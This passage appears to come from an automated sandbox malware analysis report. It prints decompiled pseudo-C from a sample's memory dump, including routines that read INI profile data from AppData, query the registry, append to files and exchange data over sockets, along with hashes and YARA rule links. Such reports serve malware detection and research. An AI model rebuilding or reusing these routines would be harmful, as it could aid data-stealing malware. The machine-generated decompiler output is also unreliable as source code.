							if(_v16 != 0 || _v6 != 0 || _t46 == 0xd || _t46 == 0xa || _t46 == 9) {
								goto L32;
							} else {
								if(_t46 != 0x26 || _t71 - _t59 <= 5) {
									L29:
									_t47 =  *((intOrPtr*)(_t59 + _t70));
									L30:
									 *((char*)(_v12 + _t70)) = _t47;
									goto L31;
								} else {
									_t33 = _t70 + 1; // 0x1
									if(StrCmpNIA(_t59 + _t33, "nbsp;", 5) != 0) {
										goto L29;
									}
									 *((char*)(_v12 + _t70)) = 0x20;
									_t59 = _t59 + 5;
									L31:
									_v12 = _v12 + 1;
									goto L32;
								}
							}
						}
						_v16 = _v16 + 1;
						if(_v16 != 0) {
							goto L32;
						}
						_t73 = _t71 - _t59;
						_t15 = _t70 + 1; // 0x1
						_t52 = _t59 + _t15;
						if(_v6 == 0) {
							_t67 = 6;
							if(_t73 <= _t67 || L012B12D0("script", _t67, _t52) == 0) {
								_v5 = 0;
								do {
									_t20 = (_v5 & 0x000000ff) + 0x12d7640; // 0x2020202
									_t68 =  *_t20 & 0x000000ff;
									if(_t73 <= ( *_t20 & 0x000000ff)) {
										goto L17;
									}
									_t22 = _t70 + 1; // 0x1
									if(L012B12D0( *((intOrPtr*)(0x12d7604 + _t53 * 4)), _t68, _t59 + _t22) != 0) {
										_t29 = (_v5 & 0x000000ff) + "\n\n\n \n\n\n\n\n\n\n\n"; // 0x200a0a0a
										_t47 =  *_t29;
										goto L30;
									}
									L17:
									_v5 = _v5 + 1;
								} while (_v5 < 0xc);
							} else {
								_v6 = 1;
							}
							goto L32;
						}
						if(_t73 > 7 &&  *_t52 == 0x2f) {
							_push(_t52 + 1);
							_t69 = 6;
							if(L012B12D0("script", _t69) != 0) {
								_v6 = 0;
							}
						}
					} else {
						_v16 = _v16 - 1;
					}
					L32:
					_t71 = _v20;
					_t59 = _t59 + 1;
				} while (_t59 < _t71);
				goto L33;
			}

0x012b8f5f
0x012b8f62
0x012b8f65
0x012b8f68
0x012b8f6a
0x012b8f6d
0x012b8f70
0x012b8f75
0x012b90a1
0x012b90ac
0x00000000
0x00000000
0x00000000
0x012b8f7b
0x012b8f7b
0x012b8f7f
0x012b8f8f
0x012b8f94
0x012b9048
0x00000000
0x012b905c
0x012b905e
0x012b9089
0x012b9089
0x012b908c
0x012b908f
0x00000000
0x012b9067
0x012b906e
0x012b907b
0x00000000
0x00000000
0x012b9080
0x012b9084
0x012b9092
0x012b9092
0x00000000
0x012b9092
0x012b905e
0x012b9048
0x012b8f9d
0x012b8fa2
0x00000000
0x00000000
0x012b8fa8
0x012b8fae
0x012b8fae
0x012b8fb2
0x012b8fe8
0x012b8feb
0x012b9005
0x012b9009
0x012b900d
0x012b900d
0x012b9016
0x00000000
0x00000000
0x012b9018
0x012b902b
0x012b903c
0x012b903c
0x00000000
0x012b903c
0x012b902d
0x012b902d
0x012b9030
0x012b8ffc
0x012b8ffc
0x012b8ffc
0x00000000
0x012b8feb
0x012b8fb7
0x012b8fc7
0x012b8fca
0x012b8fd7
0x012b8fdd
0x012b8fdd
0x012b8fd7
0x012b8f87
0x012b8f87
0x012b8f87
0x012b9095
0x012b9095
0x012b9098
0x012b9099
0x00000000

Strings

script, xrefs: 012B8FEE
nbsp;, xrefs: 012B9069
script, xrefs: 012B8FCB

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID: nbsp;$script$script
API String ID: 0-1953709447
Opcode ID: ed5b67165da5243c13a81775ce278d8e4e79ebd21b3c92015d8a58f15f1b2ef5
Instruction ID: 57476195c89027e27f651a9247b0451d210fe544334cec64ef5f4e114b06d453
Opcode Fuzzy Hash: ed5b67165da5243c13a81775ce278d8e4e79ebd21b3c92015d8a58f15f1b2ef5
Instruction Fuzzy Hash: 154122B0D2825A6EDF218BADC0C87FCBF719B1138CF0444E6CBA46B242D27559C5C711

Uniqueness

Uniqueness Score: -1.00%

Function 012C64F2 Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E012C64F2(void* __eflags, intOrPtr _a4, void* _a8) {
				signed int _v5;
				short _v20;
				short _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				char _v664;
				short _v1184;
				short _v1704;
				char _v2224;
				long _t36;
				long _t47;
				void* _t58;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t64;
				long _t80;
				void* _t81;

				_t58 = 0x2b;
				L012B1479(_t58,  &_v144);
				_t36 =  &_v664;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t36);
				if(_t36 == 0) {
					_t36 = L012B1203( &_v664,  &_v664,  &_v144);
					if(_t36 != 0) {
						_t60 = 0x2d;
						L012B1479(_t60,  &_v112);
						_t36 = L012B1203( &_v1184,  &_v664,  &_v112);
						if(_t36 != 0) {
							_t36 = GetFileAttributesW( &_v1184);
							if(_t36 != 0xffffffff) {
								_t62 = 0x2e;
								L012B1479(_t62,  &_v60);
								_t63 = 0x2f;
								L012B1479(_t63,  &_v84);
								_t64 = 0x30;
								L012B1479(_t64,  &_v20);
								_v5 = 0;
								while(1) {
									_t47 = L012B1A8C( &_v40, 0xa,  &_v60, _v5 & 0x000000ff);
									_t81 = _t81 + 0x10;
									if(_t47 < 1) {
										break;
									}
									_t47 = GetPrivateProfileIntW( &_v40,  &_v84, 0xffffffff,  &_v1184);
									_t80 = _t47;
									if(_t80 == 0xffffffff) {
										break;
									}
									_t47 = GetPrivateProfileStringW( &_v40,  &_v20, 0,  &_v1704, 0x104,  &_v1184);
									if(_t47 == 0) {
										L13:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									L012B160E(_t47,  &_v1704);
									if(_t80 != 1) {
										L12:
										_t47 = _a4();
										if(_t47 == 0) {
											break;
										}
										goto L13;
									}
									_t47 = L012B1203( &_v2224,  &_v664,  &_v1704);
									if(_t47 == 0) {
										goto L13;
									}
									goto L12;
								}
								return _t47;
							}
						}
					}
				}
				return _t36;
			}

0x012c6504
0x012c6505
0x012c650a
0x012c6518
0x012c6520
0x012c6535
0x012c653c
0x012c6547
0x012c6548
0x012c655d
0x012c6564
0x012c6571
0x012c657a
0x012c6585
0x012c6586
0x012c6590
0x012c6591
0x012c659b
0x012c659c
0x012c65a1
0x012c65a5
0x012c65b4
0x012c65b9
0x012c65bf
0x00000000
0x00000000
0x012c65d6
0x012c65dc
0x012c65e1
0x00000000
0x00000000
0x012c65ff
0x012c6607
0x012c664d
0x012c664d
0x012c6654
0x00000000
0x00000000
0x00000000
0x012c6654
0x012c660f
0x012c6617
0x012c6643
0x012c6646
0x012c664b
0x00000000
0x00000000
0x00000000
0x012c664b
0x012c662c
0x012c6633
0x00000000
0x00000000
0x00000000
0x012c6635
0x00000000
0x012c665a
0x012c657a
0x012c6564
0x012c653c
0x012c665d

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012C6518
GetFileAttributesW.KERNEL32(?,?,?), ref: 012C6571
GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 012C65D6
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 012C65FF

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: PrivateProfile$AttributesFileFolderPathString
String ID:
API String ID: 906213283-0
Opcode ID: 4e66641bc14526746141a52bbc0a5b9e60437c5bf2f7902653b4b170c45f62ef
Instruction ID: 81943a76fe8a9e91430280b106755d0328228b86aa6ee4bda47f693596f315ac
Opcode Fuzzy Hash: 4e66641bc14526746141a52bbc0a5b9e60437c5bf2f7902653b4b170c45f62ef
Instruction Fuzzy Hash: 9C41E171910219AEDF20EBA4DCC4EEEB77CAF14350F104696E355A61C4EB749B48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012CE76A Relevance: 6.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CE76A(struct HWND__* __ecx, intOrPtr* __edx) {
				struct HWND__* _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				char _v32;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t50;
				signed int _t53;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v8 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) != 0) {
					_t29 =  *((intOrPtr*)(_t61 + 0x14));
					_t53 =  *(_t29 + 0x24);
					if((_t53 & 0x40000000) == 0) {
						_t50 =  *_t61 + 0x24;
					} else {
						_t50 = _t61 + 4;
					}
					if((_t53 & 0x10000000) == 0) {
						_t30 = 0;
						goto L9;
					} else {
						if((IntersectRect( &_v28, _t29 + 0x14, _t50) & 0xffffff00 | _t39 != 0x00000000) != 0) {
							L10:
							E012CE62B( *_t61, _t55, _t50, _v8,  *((intOrPtr*)(_t61 + 0x14)));
							_v32 =  *_t61;
							_v12 =  *((intOrPtr*)(_t61 + 0x14));
							L012B124E(_v8, 0, E012CE76A,  &_v32);
						} else {
							if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) != 0) {
								_t30 = IntersectRect( &_v28,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t50) & 0xffffff00 | _t47 != 0x00000000;
								L9:
								if(_t30 != 0) {
									goto L10;
								}
							}
						}
					}
				}
				return 1;
			}

0x012ce76a
0x012ce771
0x012ce776
0x012ce77f
0x012ce78b
0x012ce791
0x012ce794
0x012ce79e
0x012ce7a7
0x012ce7a0
0x012ce7a0
0x012ce7a0
0x012ce7b1
0x012ce7f3
0x00000000
0x012ce7b3
0x012ce7cb
0x012ce7f9
0x012ce803
0x012ce80d
0x012ce813
0x012ce821
0x012ce7cd
0x012ce7dc
0x012ce7ee
0x012ce7f5
0x012ce7f7
0x00000000
0x00000000
0x012ce7f7
0x012ce7dc
0x012ce7cb
0x012ce827
0x012ce82c

APIs

GetWindowInfo.USER32 ref: 012CE783
IntersectRect.USER32 ref: 012CE7C2
IsRectEmpty.USER32(?), ref: 012CE7D4
IntersectRect.USER32 ref: 012CE7EA

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Rect$Intersect$EmptyInfoWindow
String ID:
API String ID: 2228701747-0
Opcode ID: 1a62ec038ae39a8a177611353c95c6527107b50f2ec2607ce82778eb9e66b9b6
Instruction ID: 6296f0c311aad3fcd4f300d22731a9843e8e5b4e2ca8d8936d97f59badc292fe
Opcode Fuzzy Hash: 1a62ec038ae39a8a177611353c95c6527107b50f2ec2607ce82778eb9e66b9b6
Instruction Fuzzy Hash: 5C219871510205EBEB24DF68E981D9B7BFCEF04A04B060658E642D7201D635F9098B70

Uniqueness

Uniqueness Score: -1.00%

Function 012B6B5B Relevance: 6.1, APIs: 4, Instructions: 75networksynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 012B6B92
recv.WS2_32(?,?,00000400,00000000), ref: 012B6BDA
send.WS2_32(?,?,00000000,00000000), ref: 012B6BF4
select.WS2_32(00000000,?,00000000,00000000,?), ref: 012B6C34

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: ObjectSingleWaitrecvselectsend
String ID:
API String ID: 4176622587-0
Opcode ID: be398606af181c4c5f980415e9aa92d6f8b6388282ba22d0870a14aa00970ad7
Instruction ID: 33a3537b5d58a87ea09b656741b41dcbfba09de743f2827c4862fa42286f494f
Opcode Fuzzy Hash: be398606af181c4c5f980415e9aa92d6f8b6388282ba22d0870a14aa00970ad7
Instruction Fuzzy Hash: B8211571C1112DEBCB25DF99D9899EEBBB9FB05350F2084A6E605E2240D7709B81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B7BC7 Relevance: 6.1, APIs: 4, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B7BC7(void* __ecx, short* __edx, short* _a4, int* _a8, char** _a12) {
				int _v8;
				void* _v12;
				int _v16;
				char* _t38;

				_v16 = _v16 | 0xffffffff;
				 *_a12 = 0;
				_v12 = __ecx;
				if(RegOpenKeyExW(__ecx, __edx, 0, 1,  &_v12) != 0) {
					L10:
					return _v16;
				}
				_v8 = 0;
				if(RegQueryValueExW(_v12, _a4, 0, _a8, 0,  &_v8) == 0) {
					_t30 = _v8;
					if(_v8 != 0) {
						_t38 = L012B1C17(_t30 + 4);
						if(_t38 != 0) {
							if(RegQueryValueExW(_v12, _a4, 0, _a8, _t38,  &_v8) != 0) {
								L012B1933(_t38);
							} else {
								 *_a12 = _t38;
								_v16 = _v8;
							}
						}
					} else {
						_v16 = 0;
					}
				}
				RegCloseKey(_v12);
				goto L10;
			}

0x012b7bd0
0x012b7bd7
0x012b7be2
0x012b7bed
0x012b7c5d
0x012b7c62
0x012b7c62
0x012b7bfe
0x012b7c0c
0x012b7c0e
0x012b7c13
0x012b7c23
0x012b7c27
0x012b7c3c
0x012b7c4d
0x012b7c3e
0x012b7c41
0x012b7c46
0x012b7c46
0x012b7c3c
0x012b7c15
0x012b7c15
0x012b7c15
0x012b7c13
0x012b7c56
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 012B7BE5
RegQueryValueExW.ADVAPI32(?,?,00000000,000000FF,00000000,?,?,?,?,00000000,00000001,?), ref: 012B7C08
RegQueryValueExW.ADVAPI32(?,?,00000000,000000FF,00000000,?,?,?,?,?,00000000,00000001,?), ref: 012B7C38
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000001,?), ref: 012B7C56

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 316f85d82e6430c516c7371e8f11f90aa5a1fd85badf829cdd3cca8cad3c12b8
Instruction ID: 22cba5eaddbeaf8175ae7496f8f8dc9a46c024c97470a5c4c5a22d78c4890879
Opcode Fuzzy Hash: 316f85d82e6430c516c7371e8f11f90aa5a1fd85badf829cdd3cca8cad3c12b8
Instruction Fuzzy Hash: FA21447191020AFFDB118F99DC85CEEBBB9FF84380F108069F915A7251E3318A508B20

Uniqueness

Uniqueness Score: -1.00%

Function 012BD270 Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BD270(void* __ecx, void* __edx, long _a4, DWORD* _a8, intOrPtr _a12) {
				char _v5;
				struct _OVERLAPPED _v28;
				long _t17;
				void* _t22;
				DWORD* _t28;

				_t22 = __ecx;
				_v5 = 0;
				L012B15F5( &_v28,  &_v28, 0, 0x14);
				_t28 = _a8;
				_v28.hEvent = _a12;
				if(ReadFile(__ecx, __edx, _a4, _t28,  &_v28) == 0) {
					_t17 = GetLastError();
					if(_t17 == 0x26) {
						L6:
						 *_t28 =  *_t28 & 0x00000000;
						goto L7;
					} else {
						if(_t17 == 0x3e5) {
							if(GetOverlappedResult(_t22,  &_v28, _t28, 1) != 0) {
								L7:
								_v5 = 1;
							} else {
								if(GetLastError() == 0x26) {
									goto L6;
								}
							}
						}
					}
				} else {
					_v5 = 1;
				}
				return _v5;
			}

0x012bd280
0x012bd282
0x012bd286
0x012bd28e
0x012bd291
0x012bd2a6
0x012bd2b5
0x012bd2ba
0x012bd2dc
0x012bd2dc
0x00000000
0x012bd2bc
0x012bd2c1
0x012bd2d3
0x012bd2df
0x012bd2df
0x012bd2d5
0x012bd2da
0x00000000
0x00000000
0x012bd2da
0x012bd2d3
0x012bd2c1
0x012bd2a8
0x012bd2a8
0x012bd2a8
0x012bd2ea

APIs

ReadFile.KERNEL32(?,?,?,?,?,?,00000000,00000014), ref: 012BD29E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000014), ref: 012BD2B5
GetOverlappedResult.KERNEL32(?,?,?,00000001,?,?,?,?,?,?,?,00000000,00000014), ref: 012BD2CB
GetLastError.KERNEL32(?,?,?,00000001,?,?,?,?,?,?,?,00000000,00000014), ref: 012BD2D5

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: ErrorLast$FileOverlappedReadResult
String ID:
API String ID: 1381625491-0
Opcode ID: 53cff3a65e7adb7d47806f23e3b400c63a2bbba2f89dd3d41115812c10820c1d
Instruction ID: 0fff3050881fc811cb342317b986b9dfa891440e7ee54816ae7281d745b39fd3
Opcode Fuzzy Hash: 53cff3a65e7adb7d47806f23e3b400c63a2bbba2f89dd3d41115812c10820c1d
Instruction Fuzzy Hash: AF01F93191428DABEB219AE8DCC4BEE7FBCDF15354F000056F600E6142D671D58187B1

Uniqueness

Uniqueness Score: -1.00%

Function 012B9502 Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E012B9502(WCHAR* __ecx, void* __edx, long _a4) {
				char _v5;
				long _v12;
				void* _t19;
				void* _t22;

				_push(__ecx);
				_push(__ecx);
				_t19 = __edx;
				_v5 = 0;
				_t22 = CreateFileW(__ecx, 0x40000000, 1, 0, 4, 0x80, 0);
				if(_t22 != 0xffffffff) {
					SetFilePointer(_t22, 0, 0, 2);
					if(_t19 == 0 || _a4 == 0 || WriteFile(_t22, _t19, _a4,  &_v12, 0) != 0) {
						_v5 = 1;
					}
					CloseHandle(_t22);
				}
				return _v5;
			}

0x012b9505
0x012b9506
0x012b951d
0x012b951f
0x012b9528
0x012b952d
0x012b9534
0x012b953c
0x012b9557
0x012b9557
0x012b955c
0x012b955c
0x012b9569

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B9522
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B9534
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B954D
CloseHandle.KERNEL32(00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 012B955C

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: ecd4bf42ed413c568336b6b7b2d8a07f984095059f607334dfd8384b720c8030
Instruction ID: b86307816fd593bcb08bf65a6a92fac9a7167f095df5725990d905fdc9dfd1c5
Opcode Fuzzy Hash: ecd4bf42ed413c568336b6b7b2d8a07f984095059f607334dfd8384b720c8030
Instruction Fuzzy Hash: 86F0D1B25511197EFB204AACECCCFEF3E6CDB41398F004124FB51A5081D6704D498375

Uniqueness

Uniqueness Score: -1.00%

Function 012C2927 Relevance: 6.0, APIs: 4, Instructions: 42
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C2927(void* __ebx, void* __edi, void* __esi) {
				void* _t1;
				void* _t3;
				long _t9;

				L012B1654(_t1);
				_t3 = L012B1780(0x19367401, 1);
				_t25 = _t3;
				if(_t3 != 0) {
					if(L012B150A() == 0) {
						L7:
						L012B1492(_t25);
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t9 = WaitForSingleObject( *0x12dcc54, 0x1388);
					while(_t9 == 0x102) {
						L012B17CB();
						_t9 = WaitForSingleObject( *0x12dcc54, 0x1388);
					}
					goto L7;
				}
				return _t3 + 1;
			}

0x012c292a
0x012c2936
0x012c293b
0x012c293f
0x012c294b
0x012c298f
0x012c2991
0x00000000
0x012c2996
0x012c2959
0x012c2971
0x012c2988
0x012c297a
0x012c2986
0x012c2986
0x00000000
0x012c298e
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 012C2952
SetThreadPriority.KERNEL32(00000000), ref: 012C2959
WaitForSingleObject.KERNEL32(00001388), ref: 012C2971

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Thread$CurrentObjectPrioritySingleWait
String ID:
API String ID: 991781811-0
Opcode ID: 48d74a8af917717e9e02f578c6629a9bb33a14e580a4bcc47e3a100e8ae7c4c0
Instruction ID: 87d03e25190b926321ba1b59d1bd1631fed9efced5570a73e32e3dad9b3797aa
Opcode Fuzzy Hash: 48d74a8af917717e9e02f578c6629a9bb33a14e580a4bcc47e3a100e8ae7c4c0
Instruction Fuzzy Hash: 1FF0243153010A9AA62237ACBCD89FA7B5DDBA0BE0724022AEB0683145DD214810C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B4E45 Relevance: 6.0, APIs: 4, Instructions: 38
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B4E45(void* __ecx) {
				intOrPtr _v20;
				void* _v32;
				signed int _t5;
				signed int _t6;
				int _t8;
				void* _t12;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t12 = __ecx;
				_t5 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t5;
				_t6 = _t5 | 0xffffffff;
				if(_t15 != _t6) {
					_v32 = 0x1c;
					_t8 = Thread32First(_t15,  &_v32);
					while(_t8 != 0) {
						if(_v20 == _t12) {
							_t14 = _t14 + 1;
						}
						_t8 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t6;
			}

0x012b4e4e
0x012b4e53
0x012b4e55
0x012b4e5a
0x012b4e5c
0x012b4e61
0x012b4e68
0x012b4e6f
0x012b4e86
0x012b4e79
0x012b4e7b
0x012b4e7b
0x012b4e81
0x012b4e81
0x012b4e8b
0x00000000
0x012b4e91
0x012b4e97

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 012B4E55
Thread32First.KERNEL32 ref: 012B4E6F
Thread32Next.KERNEL32 ref: 012B4E81
CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?), ref: 012B4E8B

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

